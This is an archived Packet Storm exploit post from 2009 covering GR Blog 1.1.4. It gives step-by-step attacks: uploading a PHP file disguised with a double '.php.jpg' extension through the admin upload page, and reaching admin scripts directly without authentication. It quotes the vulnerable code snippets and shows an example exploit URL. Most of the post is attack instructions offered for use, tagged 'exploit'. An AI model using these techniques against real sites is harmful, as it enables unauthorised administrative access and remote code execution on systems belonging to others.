what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GR Blog 1.1.4 Upload / Bypass

GR Blog 1.1.4 Upload / Bypass
Posted Feb 4, 2009
Authored by JosS | Site spanish-hackers.com

GR Blog versions 1.1.4 suffers from remote file upload and authentication bypass vulnerabilities.

tags | exploit, remote, vulnerability, bypass, file upload
SHA-256 | 86b378c7ae8c58c73524e90124620acde3c589ae6a2fac9156118a503ef8c8a3

GR Blog 1.1.4 Upload / Bypass

Change Mirror Download
GR Blog v1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities

Author: Jose Luis Gongora Fernandez
(a.k.a) JosS <sys-project[at]hotmail.com>

Web: http://hack0wn.com/

/*************************/
TEST ON VERSION GR Blog v1.1.4, (in my localhost)
Download : http://sirini.net/grboard/board.php?id=grblog&articleNo=43
/*************************/

[+] Remote File Upload:

/admin/admin_upload.php (simple bypass)
upload --> name.php.jpg

PATH example: /data/2009/02/04/name.php.jpg


--------------
files: /admin

[+] SIMPLE bypass:

admin_user.php
admin_post.php
admin_all.php
more files...

!xpl: you enter in any files

[+] GET bypass:

admin_modify_comment.php
--
<?php
@header('Content-Type: text/html; charset=utf-8');
if(array_key_exists('uid', $_GET) && $_GET['uid']) $uid = $_GET['uid'];
else exit();
--
!xpl: http://localhost/blog/admin/admin_modify_comment.php?uid=1

more files...

[+] POST bypass:

admin_category.php
--
<?php
if(array_key_exists('categoryName', $_POST) && $_POST['categoryName'])
--
!xpl: --

admin_insert.php
--
<?php
$e = true;
if(array_key_exists('postStart', $_POST) && $_POST['postStart'])
--
!xpl: --

more files...

__h0__


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close